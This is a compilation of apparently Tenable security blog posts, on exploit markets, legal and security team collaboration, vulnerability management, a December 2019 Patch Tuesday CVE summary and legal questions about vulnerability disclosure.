• Gray market: Composed of nation states and state-sponsored agencies/actors, motivated by national security concerns, that acquire and develop exploits for covert intelligence operations.
• Black (criminal) market: Exists mainly on the dark web. Black marketers sell capabilities required to weaponize and productize exploits in the form of cybercrime-as-a-service offerings (e.g., offensive operations such as ransomware).

Vulnerability-to-exploit supply chain: One ecosystem, conflicting goals 

These markets are symbiotic and share a single ecosystem, but their objectives are diametrically opposed. The white market seeks to “defend and disclose” while the black market aims to “attack and obfuscate.” Gray market participants carefully balance national security and public security, relying on the latter, but will disclose for the greater good. By the time an exploit moves from vulnerability discovery to being used in an attack, it will have jumped across at least two and sometimes all three of these markets.

Supply Chain flow, showing the journey through the white, gray and black V2E markets

Vulnerability-to-exploit supply chain: Common start, differing or even parallel paths

Whichever of the three markets, the journey always begins with the discovery of a vulnerability, but then can take divergent and occasionally even parallel paths. The only difference is the white market uses the vulnerability and exploit intelligence to develop and deploy defensive capabilities, rather than pursue criminal objectives like the black market.

Mirrored legal and illegal V2E supply chain

Commercialization of the vulnerability-to-exploit supply chain

Both sides of the supply chain, whether defensive or offensive, diverge into commercial offerings. Research shows the black market has professionalized in recent years, with cybercrime-as-a-service offerings catering to a wide variety of criminal activities. Many of these are microservices bundled together to create purpose-designed attack architectures – from victim identification and profiling to persistence and attack obfuscation. Business-to-business services (e.g, money laundering, cryptocoin escrow services) complete an end-to-end ecosystem, making sophisticated offensive cyber capabilities available to anyone with sufficient will and capital. 

While the barriers of entry to develop and weaponize exploits have risen due to this professionalization, the barriers of entry to conduct criminal and offensive cyberoperations in terms of required skill and tooling have been lowered. Criminals can buy together whatever capabilities they require and focus on committing the crime. This may well lead to growth in cybercrime, but it also represents an Achilles heel for smart defenders to target.

Less diversity in vulnerabilities being targeted in the wild

This increase in professionalism has come at the cost of diversity – less diversity in threat actors, especially less diversity in their deployed tools, tactics and procedures. That all equates to less diversity in vulnerabilities being targeted in the wild. Which for end users and the community – with the right intelligence – means more strategic remediation and less work.

This three-part blog series explores the relationship between law and security, as it pertains to vulnerability management. In part one, we’ll look at how the changing field of cybersecurity requires legal and security teams to work together more closely than ever. 

Instead of merely being an issue for IT and security teams, cybersecurity has become a primary concern across the business – especially for the legal team. As the field of cybersecurity continues to evolve, legal and security teams will need to work together to create cohesive cybersecurity measures. 

The laws security teams need to know 

From Europe’s General Data Protection Regulation (GDPR) to its Californian counterpart, it’s evitable that laws will affect the work of the security team. Determining which regulations apply is only the first step, as cybersecurity practitioners also need to decide how those regulations should be interpreted within their specific organization. A close working relationship between legal and security teams is imperative for organizations to maintain compliance and avoid hefty fines or reputational damage. 

Here are some critical components of current cybersecurity and data laws that your legal team can help explain to your security team: 

U.S. federal law

The U.S. has no overarching federal cybersecurity laws. However, there may still be federal regulations that businesses must comply with. Government contracted workers have specific cybersecurity rules to follow. For example, the Department of Defense requires contractors to comply with set cybersecurity standards or risk losing their contract. There are also industry-specific federal laws to be aware of (e.g., HIPAA, GLBA). Depending on what industry your organization operates in, you may have specific regulations to follow. 

Questions to ask your legal team:

• Are there industry-specific privacy or data regulations that our security measures must comply with? 
• If so, what sort of protections and security measures will we need to put into place to both comply with federal law and prevent security breaches?
• To maintain compliance, how can the legal and security teams work together to continuously monitor changes to existing laws and implementation of new laws?

State law

Cybersecurity and privacy laws can vary on a state-by-state basis. For example, in the instance of a data breach, different states have different requirements for data collection or notification timelines. Knowing the different regulations for each state could save your organization from fines or reputational risk. The National Conference of State Legislatures provides an overview of data security laws for each state. 

Some states are stricter than others when it comes to cybersecurity. New York, for example, has special laws in place to regulate the financial sector. The state of California has the most stringent information security regulations in place. The California Consumer Privacy Act (CCPA) gives consumers many rights, such as the right to know if their personal data is being collected and whether or not that data is sold. It also allows consumers to access their personal data. 

On January 1, 2020, California will enact SB-327 Bill for IoT Security, making it the first state to pass a law concerning IoT. The bill requires that internet-connected devices be equipped with “reasonable” security features. This piece of legislation is particularly powerful because vendors selling devices in other states as well as California must comply. 

Questions to ask your legal team: 

• How should we be thinking about varying state laws when building security measures?
• Are we operating in any states that may have stricter cybersecurity laws than others?
• If one state has more stringent laws, what does that mean for our operations in other states? 

International law 

In 2018, the European Union (EU) implemented GDPR, which applies not only to EU businesses, but to any businesses that provide services to individuals in the EU or monitor the behavior of EU individuals. GDPR is a sweeping regulation intended to give individuals more control over their personal information. Businesses can be hit with heavy fines for non-compliance. 

Questions to ask your legal team: 

• What aspects of GDPR affect our company’s security measures? 
• If we were to collect personal information from individuals, how should we notify them – or do we need to obtain their consent before doing so?
• Should we minimize the amount of data we process in order to comply? 

It’s a two-way street

For both parties to work cohesively, security teams need to work with the legal team to understand different laws that may impact a security policy. On the other hand, legal teams need to learn from the security teams how data is collected and used, and what technologies are being implemented. The legal team should understand not only how an organization uses its data, but how that data transfers throughout the organization. By understanding how data is used and transferred within an organization, the legal team is better equipped to understand the specific laws and regulations that apply in specific scenarios. 

When security and legal work together to take an interdisciplinary approach to cybersecurity measures, an organization is better poised to manage cyber risk in the modern era. 

Disclaimer: This post does not seek to give legal advice nor delve into the finer points of data protection legislation. Due to the complex nature of information security law, it is critical that legal and security teams work together to understand which laws apply to them and ensure they are engaging in industry best practices. The laws and regulations discussed above will provide a critical groundwork from which cybersecurity practitioners can build upon in order to create compliant security plans and understand their legal risk. 

Today’s cyber landscape changes in the blink of an eye. It’s critical to understand why your business is vulnerable – so you can take the right steps to protect it.

According to Ponemon Institute’s report, Measuring & Managing the Cyber Risks to Business Operations, 91% of surveyed organizations have suffered cyberattacks in the past 24 months. And 60% have experienced two or more business-disrupting cyber events in that same time period.  

Based on Tenable Research’s Vulnerability Intelligence Report, the live population (22,625) of distinct vulnerabilities that actually reside in enterprise environments represent 23% of all possible CVEs (107,710). Knowing these numbers, it is essential to understand and track your organization’s security posture and cyber risk over time.

Let’s look at three reasons why vulnerability management is key and how it can help you properly assess your organization’s level of cyber risk.

1. We’ve entered a new era of cyber conflict

By understanding the evolution of cyber conflict, you’ll know the challenges you’re up against. The cybersecurity space continues to evolve, especially with the increasing ease of access to computer resources and knowledge. 

This has introduced a whole-new set of players to the dark side of the equation – players who have the secrecy, resources, funds and capabilities to exploit vulnerabilities. Furthermore, many businesses have failed to keep up with the changing environment, and poor cyber hygiene has left them vulnerable to attacks.  

According to the U.S. National Vulnerability Database (NVD), there was a 52% increase in the number of vulnerabilities discovered in 2017 compared to 2016, with an overall number of 15,038 vulnerabilities. This big jump indicates two key things: 

• More people – whether security researchers, bug bounty participants or threat actors with malicious intent – are examining products and discovering vulnerabilities. 
• Software quality is dropping. With more start-ups, the adoption of IoT and a faster speed of business, organizations started to shorten the testing and quality assurance process to go to market faster and capture the business first, then deal with the caveats later. (This needn’t be the case though. Check out our container security ebook to keep DevOps moving at the speed of business.)

2. Network structures continue to evolve

Understanding changing network structures is key to understanding how a business is vulnerable. Network evolution has multiple aspects: 

• Network structure: The complexity of network architecture is growing due to increased virtualization (either through containers, automation, DevOps or software-defined network) and the emergence of prepackaged web applications. 
• Network components: Today’s attack surface now includes smart devices and IoT, bring our own device (BYOD) flexibility, roaming users and cloud services.
• IT and OT network security: Ownership of the two areas is merging.

In short, it is increasingly difficult to get a full picture of the network.

3. Security teams are overwhelmed 

At the end of the day, you may have hundreds or thousands of assets to protect on your network. The attacker may only need a single weak entry point. It may seem like an insurmountable challenge, but every solution has to start somewhere. 

There isn’t a single CISO or security leader who does not ask his/her team the following questions:

• How secure - and exposed - are we?
• What should we prioritize? 
• How are we reducing exposure over time?
• How do we compare to our peers? 

The answers to these questions are the primary driver for understanding where your business is vulnerable and beginning to make improvements. 

Getting back to cyber hygiene basics with vulnerability management

Considering the above variables and challenges, it is extremely rare to find a security leader who can confidently define their network boundaries. As a result, organizations often end up with a concerning number of blind spots in their networks. 

Going back to the cyber hygiene basics with vulnerability management and honestly evaluating the challenges you are facing is a key to understanding where your business is vulnerable. This will enable you to establish a functional process to measure your business’s overall risk and protect your network. 

The most basic fact is: you can’t protect what you can’t see. Acquiring tools, technologies, skills and services to confidently define the network boundaries, type and number of assets, applications and services should be the first priority for any security leader. It is the primary building block for an effective security program. Once you have complete visibility into your vulnerabilities, you can get into the race. 

Get full visibility into your vulnerabilities with Nessus Start your free trial now

Microsoft closes out 2019 by patching 36 CVEs, including one flaw that was exploited in the wild as a zero-day.

Microsoft sent administrators around the world an early holiday gift with a lighter-than-usual Patch Tuesday. The December 2019 Patch Tuesday contains updates for 36 CVEs, seven of which are rated as critical. This month’s updates include patches for Microsoft Windows, Microsoft Office, Internet Explorer, SQL Server, Visual Studio, and Skype for Business. The following is a breakdown of the most important CVEs from this month’s release.

CVE-2019-1458 | Win32k Elevation of Privilege Vulnerability

CVE-2019-1458 is a high-severity elevation of privilege vulnerability in Microsoft Windows that occurs when the Win23k component fails to properly handle objects in memory. An attacker who is able to log onto the system could execute a specially crafted application to exploit this flaw to run arbitrary code in kernel mode. Microsoft’s advisory notes this vulnerability has been exploited in the wild, and according to researchers Anton Ivanov and Alexey Kulaev of Kaspersky Lab is connected to another zero-day exploit in Google Chrome that the researchers disclosed in November.

CVE-2019-1471 | Windows Hyper-V Remote Code Execution Vulnerability

CVE-2019-1471 is a sandbox escape code execution vulnerability caused by a malicious application on a virtual machine (VM) running on the targeted Hyper-V host. An attacker would either need to deploy a malicious application on an existing VM or deploy their own malicious VM on the target Hyper-V host. Once an attacker has that access, an attacker could exploit this vulnerability to cause the Hyper-V host to execute arbitrary code.

CVE-2019-1468 | Win32k Graphics Remote Code Execution Vulnerability

CVE-2019-1468 is a vulnerability within the Windows font library, which could lead to remote code execution if embedded fonts are handled incorrectly. An attacker could exploit this by creating a malicious document or webpage with this vulnerability embedded in it, requiring the victim to either visit the affected site or open the malicious document. Exploitation of this vulnerability could lead to the execution of arbitrary code on the victim's system.

CVE-2019-1387, CVE-2019-1349, CVE-2019-1350, CVE-2019-1352, CVE-2019-1354 | Git for Visual Studio Remote Code Execution Vulnerability

CVE-2019-1387, CVE-2019-1349, CVE-2019-1350, CVE-2019-1352 and CVE-2019-1354 are remote code execution vulnerabilities caused by unsanitized command line inputs in Git for Visual Studio. When exploited, an attacker could cause Visual Studio to execute code within the context of the current user account. These vulnerabilities are therefore limited by user access, so restricted user accounts would pose a lower risk than a compromised administrator account.

CVE-2019-1484 | Windows Object Linking and Embedding Remote Code Execution Vulnerability

CVE-2019-1484 is a vulnerability in Windows Object Linking and Embedding (OLE) that could lead to remote code execution if it fails to validate user input correctly. Exploitation of this vulnerability would require an attacker to create a malicious file and the victim to execute this file on their system, potentially leading to the execution of arbitrary code on their system.

CVE-2019-1462 | Microsoft PowerPoint Remote Code Execution Vulnerability

CVE-2019-1462 is a remote code execution vulnerability in Microsoft PowerPoint. This flaw occurs due to improper handling of objects in memory. Exploitation of this would require an attacker to convince a user to open a specially crafted file with an affected version of Microsoft PowerPoint, such as via a phishing campaign. Once the crafted file is opened, however, it could allow for arbitrary code to be run with the same privileges as the user who opens the file. Microsoft notes the Reading Pane is not an attack vector for this particular vulnerability.

CVE-2019-1485 | VBScript Remote Code Execution Vulnerability

CVE-2019-1485 is a remote code execution vulnerability due to how the VBScript engine handles objects in memory. When exploited, the vulnerability could corrupt memory in such a way that allows an attacker to execute arbitrary code. This flaw is noted to be more likely to be exploited according to Microsoft, and would most likely be used in malware or phishing campaigns. To exploit this vulnerability, an attacker would need to entice a user to visit a specially crafted website with Internet Explorer or embed an ActiveX control in an application or Microsoft Office document that hosts the Internet Explorer rendering engine.

Tenable Solutions

Users can create scans that focus specifically on our Patch Tuesday plugins. From a new advanced scan, in the plugins tab, set an advanced filter for Plugin Name Contains December 2019.

With that filter set, click the plugin families to the left, and enable each plugin that appears on the right side. Note: If your families on the left say Enabled, then all the plugins in that family are set. Disable the whole family before selecting the individual plugins for this scan. Here’s an example from Tenable.io:

A list of all of the plugins released for Tenable’s December 2019 Patch Tuesday update can be found here. As always, we recommend patching systems as soon as possible and regularly scanning your environment to identify those systems yet to be patched.

As a reminder, Windows 7 support will be discontinued on January 14, 2020, so we strongly recommend reviewing what hosts remain and any action plans for migration. Plugin ID 11936 (OS Identification) can be useful for identifying hosts still running on Windows 7.

Get more information

• Microsoft's December 2019 Security Updates
• Tenable plugins for Microsoft December 2019 Patch Tuesday Security Updates

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.

Get a free 30-day trial of Tenable.io Vulnerability Management.

In part two of our series exploring the relationship between law and security, we’ll look at the key questions cybersecurity should ask legal when a company learns about a vulnerability in a product they produce or use. 

Vulnerabilities reside within somewhat of a legal and ethical gray zone when it comes to disclosure and response. There are responsible disclosure practices, but no laws that regulate disclosure. However, vulnerabilities have triggered several instances of litigation. 

That’s right: Even without a security breach, a vulnerability alone is enough to bring legal action. Having a legal team be a central part of your vulnerability management plan could save your organization a much bigger headache down the line. 

Five questions cybersecurity should ask legal about vulnerability disclosure

#1. What are the legal risks we’ll have in the event of a reported vulnerability? 

Recent litigation trends show lawsuits emerging over vulnerabilities, even in situations where breaches have not occurred. Knowledge of a vulnerability without timely public disclosure and patching can lead to lawsuits over negligence, breach of implied warranty, deceptive practices and more. Take, for example, the 32 lawsuits that emerged over Intel’s handling of microchip vulnerabilities Meltdown and Spectre. 

Asking your legal team about the legal risks of vulnerability disclosure can inform your vulnerability management program and prevent unwanted litigation. 

#2. What are some practical steps we can take to avoid legal action? 

No one wants to get sued. Regardless of the legal outcome, lawsuits can result in reputational harm to your organization. Moreover, your organization will incur costs and expend time and resources on the lawsuit. There are several steps your organization can take to avoid legal action: 

• Have a vulnerability disclosure program (VDP) 
• Practice responsible or coordinated disclosure 
• Patch vulnerabilities in a timely fashion

#3. How can we use the law to understand our cyber risk?

Too often, security and tech fields fail to recognize that the law is a crucial tool for understanding cybersecurity. In some instances, the law can actually help security and tech teams understand their cyber risk. Both GDPR and the California Consumer Protection Act (CCPA) require organizations to provide “reasonable” security when it comes to protecting consumer data. 

Interpreting what reasonable security means for your organization can help to understand your specific organization’s cyber risk. For example, examining where protections are already in place can reveal other areas that lack similar protection. The definition of reasonable security has changed from when it was first used, and the phrase will likely continue to evolve with industry changes. So, it is important to continuously compare your security measures to those of your peers. In doing so, you are using the law to help understand your cyber risk, and develop and maintain your security measures. 

#4. How can legal help us improve our vulnerability management response plan?

When vulnerabilities are disclosed, particularly those that receive media attention, panic can ensue. Mitigate this by having a vulnerability management program that prepares you for when vulnerabilities are disclosed. A vulnerability management program should include:

• A VDP
• A response plan
• An outline for expected communications between researchers, companies and media

Having legal, security and IT work as a cohesive unit can hugely benefit your response plan. Asking the legal team for their input could bolster your vulnerability management program because it creates the opportunity for additional insight. A lawyer may not have the same technical skills as, say, the IT department, but their unique background can bring a fresh perspective to vulnerability management. They may be able to discern whether or not legal issues could arise out of your vulnerability management plan. 

#5. Does our VDP follow legal best practices?

If your organization has a VDP (which it should), you can establish legal best practices. Aside from providing security researchers with a clear process and scope for reporting vulnerabilities, a VDP should also grant researchers safe harbor. A sound VDP lets researchers know that you won’t sue them for finding and reporting a vulnerability in your system. Your legal team can assist in developing a VDP that follows industry best practices and provides a legal safety net for researchers. 

The questions above are just a starting-off point, helping establish both stronger communication between legal and security teams and a better vulnerability management plan. 

Get more information 

• U.S. Department of Justice: A Framework for Vulnerability Disclosure Programs for Online Systems
• U.S. Department of Homeland Security, National Infrastructure Advisory CouncilVulnerability Disclosure Framework